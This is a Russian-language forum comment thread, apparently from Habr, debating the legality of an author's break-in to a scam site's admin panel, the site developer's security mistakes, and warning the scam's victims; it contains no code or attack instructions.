                                                                                                                                                              Сам заказ был в том, чтобы перенести их сайт с тильды на «свой хостинг» и написать простую админку для публикации фильмов и тп.

                                                                                                                                                              Почему опровдания о незаконности есть, а извенений за дыры в коде нет? ヽ(‵﹏´)ノ (┻━┻)
                                                                                                                                                              Непростительно ((╬◣﹏◢))

                                                                                                                                                              Профиль скрыт из любви к искусству, или автор знаком с другим деаноном?

                                                                                                                                                              Неужели в «Харьковском патентно-компьютерный колледже» ничего про защиту от взлома не говорили?
                                                                                                                                                                –1
                                                                                                                                                                Не до извинений было, сори.
                                                                                                                                                                Господи, вопрос про профиль, это вообще что-то забавное. Вам по кайфу все искать обо мне?))
                                                                                                                                                                Профиль скрыт, ибо это по дефолту, походу. Ну точно не специально. И вообще я шиккикомори пользовался месяца два максимум, ибо неудобно мне каждый раз помечать какие-то анимешки… Не вижу в этом смысла. Смотрю и смотрю)
                                                                                                                                                                  +3
                                                                                                                                                                  Неужели в «Харьковском патентно-компьютерный колледже» ничего про защиту от взлома не говорили?
                                                                                                                                                                    –12

                                                                                                                                                                    У нас очень хороший колледж, где преподают лишь современную информацию.
                                                                                                                                                                    Зачем учить защите в пхп, если можно установить вп, где все уже защитили за тебя?

                                                                                                                                                                      +5
                                                                                                                                                                      если можно установить вп
                                                                                                                                                                      вп — это WordPress?

                                                                                                                                                                      Чем вам так преподаватели насолили, что вы им тут такую антирекламу делаете? Уже б сказали что прогуливали занятия…
                                                                                                                                                                        +5
                                                                                                                                                                        Вы таки хотели сказать «где все дыры сделали за тебя»?
                                                                                                                                                                        На WordPress приходится около 75% взломов всех CMS.
                                                                                                                                                                          –3
                                                                                                                                                                          У Вас есть опыт взлома WP через его «дыры»?
                                                                                                                                                                            +2
                                                                                                                                                                            Справедливости ради скорее всего это из-за его популярности. Там теперь автообновления безопасности есть, так что все не так уж и плохо.
                                                                                                                                                                            +9
                                                                                                                                                                            На ваш коммент хочется повесить золотую табличку «Весь уровень подобных учебных заведений в двух фразах».

                                                                                                                                                                            У нас очень хороший колледж, где преподают лишь современную информацию. Зачем учить защите в пхп, если можно установить вп, где все уже защитили за тебя?
                                                                                                                                                                            +2
                                                                                                                                                                            Сначала прочитал как «Латентно-компьютерный колледж». Даже не удивился.
                                                                                                                                                                            –2

                                                                                                                                                                            Так открой. Интересно же узнать что смотрят злобные кулхацкеры.

                                                                                                                                                                          0

                                                                                                                                                                          del

                                                                                                                                                                          +2
                                                                                                                                                                          Все это похоже на проведение оперативно-розыскных мероприятий. А вот список органов власти, кто может осуществлять такую деятельность: Органы внутренних дел Российской Федерации, Органы федеральной службы безопасности, Федеральный орган исполнительной власти в области государственной охраны, Таможенные органы Российской Федерации
                                                                                                                                                                          Служба внешней разведки Российской Федерации.
                                                                                                                                                                          Все это регламентируется Федеральным законом «Об оперативно-розыскной деятельности»
                                                                                                                                                                          от 12 августа 1995 года N 144-ФЗ, принятым Государственной Думой 5 июля 1995 года

                                                                                                                                                                          (в ред. Федеральных законов от 18.07.1997 N 101-ФЗ,
                                                                                                                                                                          от 21.07.1998 N 117-ФЗ, от 05.01.1999 N 6-ФЗ,
                                                                                                                                                                          от 30.12.1999 N 225-ФЗ, от 20.03.2001 N 26-ФЗ,
                                                                                                                                                                          от 10.01.2003 N 15-ФЗ, от 30.06.2003 N 86-ФЗ,
                                                                                                                                                                          от 29.06.2004 N 58-ФЗ, от 22.08.2004 N 122-ФЗ,
                                                                                                                                                                          от 02.12.2005 N 150-ФЗ, от 24.07.2007 N 211-ФЗ,
                                                                                                                                                                          от 24.07.2007 N 214-ФЗ, от 29.04.2008 N 58-ФЗ,
                                                                                                                                                                          от 22.12.2008 N 272-ФЗ, от 25.12.2008 N 280-ФЗ,
                                                                                                                                                                          от 26.12.2008 N 293-ФЗ, от 28.12.2010 N 404-ФЗ,
                                                                                                                                                                          от 21.11.2011 N 329-ФЗ, от 08.12.2011 N 424-ФЗ)
                                                                                                                                                                          Т.е. автор, своими действиями и публикацией — нарушил все вот это вот вышеперечисленное :)
                                                                                                                                                                            +1
                                                                                                                                                                            Смотрим на это с другой стороны. Аноним misery-hacker разместил на хабре статью.
                                                                                                                                                                            Петр Иванов прочитал и на сайте генпрокуратуры написал обращение «Я, Петр Иванов, прочитал статью „Как я хакера ловил“ по адресу habr.com/ru/post/448810
                                                                                                                                                                            В статье содержится информация о преступлении.
                                                                                                                                                                            Прошу провести проверку изложенных фактов.»
                                                                                                                                                                            Будет ли прокуратуру интересовать личность misery-hacker так чтобы попытаться его найти?
                                                                                                                                                                              0
                                                                                                                                                                              Скорее всего да, т.к. действия Gelloiss еще надо квалифицировать (тем более, что в «свободном общении» он факт умысла отвергает), а вот misery-hacker прямо в полный рост расписал осуществление преступного умысла. И сам умысел "… на блюдечке с голубой каемочкой..." преподнес. Я так и вижу формулировку: "… руководствуясь мотивом мести, из хулиганских побуждений, осознавая противоправность деяния ..."
                                                                                                                                                                                0
                                                                                                                                                                                А что? Заявление от пострадавшего от действий взломщика совсем не нужно?
                                                                                                                                                                                  0
                                                                                                                                                                                  Нет. Javian очень корректно сформулировал:
                                                                                                                                                                                  Прошу провести проверку изложенных фактов
                                                                                                                                                                                  По действующим нормам о преступлении может сообщить любой гражданин.
                                                                                                                                                                                    0
                                                                                                                                                                                    Не требуется. УПК РФ ст.21.2:
                                                                                                                                                                                    В каждом случае обнаружения признаков преступления прокурор, следователь, орган дознания и дознаватель принимают предусмотренные настоящим Кодексом меры по установлению события преступления, изобличению лица или лиц, виновных в совершении преступления.
                                                                                                                                                                                    Аналогичная статья есть в КоАП РФ (ст. 28.1.1.1). Заявление требуется только в гражданско-правовых отношениях.
                                                                                                                                                                                      0
                                                                                                                                                                                      Уголовные дела публичного обвинения (перечень статей есть в УПК) могут возбуждаться без заявления потерпевшего.
                                                                                                                                                                                      +1
                                                                                                                                                                                      Не надо пугать. Для привлечения по любой статье нужно доказать злой умысел, в т.ч. и для привлечения по 272 статье «неправомерный доступ». Это — единственное, за что здесь можно привлечь. Прокурур, если дело дойдет до суда, вспотеет, доказывая злой умысел во фразе «с целью установления личности злоумышленника и пресечения его деятельности, я принялся изучать сайт...». А адвокату всего лишь придется помахать этой статьей, которая ясно говорит, что никакого умысла у misery-hacker не было. Следователь, осознавая всю бесперспективность этой затеи, даже дела открывать не будет, а если и откроет по заявлению, закроет «за отсутствием состава преступления».
                                                                                                                                                                                        +1
                                                                                                                                                                                        и не планировал пугать, а только рассуждал, полагаясь на здравый смысл и некоторое знание системы.
                                                                                                                                                                                        1. очень много зависит от того как происходящее преподнесут в заявлении.
                                                                                                                                                                                        2. много зависит и от ответа самих участников (или их адвокатов). но при этом надо помнить, что на стадии доследственной проверки адвокат может быть только в одном случае: если заранее заключен договор…
                                                                                                                                                                                        3. факт «взлома» ака «несанкционированного доступа к чуствительной информации» через уязвимость к «админке» расписал никто иной как мистери-хакер. причем со всеми подробностями.
                                                                                                                                                                                        зря вы ссылаетесь на «злой умысел», нет такого в подзаконных документах. есть «умысел на совершение противоправных действий», злой он или добрый это уже следствию и суду разбираться. а умысел есть, да с реализацией.
                                                                                                                                                                                        я не «за охотника либо медведя». я против человеческой глупости и незнания норм и правил.
                                                                                                                                                                                        и не думаю, что есть необходимость продолжать, ибо все в руках Богов Великого Рандома.
                                                                                                                                                                                        Но ТС знатно подставился, это факт.
                                                                                                                                                                                          0
                                                                                                                                                                                          Очень сильно поддержу этот комментарий: как минимум, я был бы рад (относительно), если бы написание фразы «В исследовательских целях», «Для поиска злоумышленника» защищало бы исследователей и энтузиастов. Но боюсь, что в реальности это не так просто.

                                                                                                                                                                                          Отдельный вопрос в следующем: автор явно сначала сделал то, что описано в статье, а потом уже написал ее. Поэтому я подозреваю, что вполне возможно рассуждение вида «Была использована уязвимость в сервисе, получен доступ к данным карт, потом была написана статья, где в целях оправдания себя было указано, что это сделано для поиска злоумышленника.» Понятно, что я почти не верю в реальность того, что написано в кавычках, но в судах и в следственных органах работают другие люди, которые могут воспринять все иначе.
                                                                                                                                                                                            +1
                                                                                                                                                                                            Очень сильно поддержу этот комментарий: как минимум, я был бы рад (относительно), если бы написание фразы «В исследовательских целях», «Для поиска злоумышленника» защищало бы исследователей и энтузиастов. Но боюсь, что в реальности это не так просто.
                                                                                                                                                                                            Зачем нужны эти индульгенции? Взрослые люди и так должны понимать что хорошо, а что плохо.
                                                                                                                                                                                              0
                                                                                                                                                                                              Это не оправдывает, этим только МВД может заниматься.
                                                                                                                                                                                        +1
                                                                                                                                                                                        Аноним misery-hacker разместил на хабре статью.
                                                                                                                                                                                        Не совсем. Если бекапы с сайта успели слить, то есть что копать
                                                                                                                                                                                        Насторожившись, я написал в техподдержку сайта, и мошенники не заставили себя долго ждать — поняв, что я достаточно технически грамотен послали меня на 3 буквы. Конечно, мошенникам нет смысла тратить на меня время, но зачем так грубо? — В любой ситуации нужно оставаться Человеком.

                                                                                                                                                                                        misery-hacker, бекапы уничтожил?
                                                                                                                                                                                        0
                                                                                                                                                                                        А какими законами РФ регламентируется такая деятельность вне территории РФ и не по отношению к гражданам РФ?
                                                                                                                                                                                        +1
                                                                                                                                                                                        Интересно почитать. Про и дилетант.
                                                                                                                                                                                          +2
                                                                                                                                                                                          Я там вижу раздел «Адреса». Люди вводят свой email? Можно сделать «краудфандинг», разослав эту статью пострадавшим. А они уж сами придумают, как его наказать.
                                                                                                                                                                                            0
                                                                                                                                                                                            В первую очередь надо предупредить, что карту надо заблокировать.
                                                                                                                                                                                              0
                                                                                                                                                                                              Да, именно так. И чтобы вообще поменяли всё, что только можно. А то имея часть информации о человеке почти всегда можно на основании этой части собрать ещё. И ещё. И ещё. И так пока, действительно, даже кража личности не станет вполне реализуемой.
                                                                                                                                                                                                –1
                                                                                                                                                                                                И чтобы вообще поменяли всё, что только можно.

                                                                                                                                                                                                ФИО? Вообще, бесит современный мир, где ФИО требуют где попало, а сменить их весьма сложно.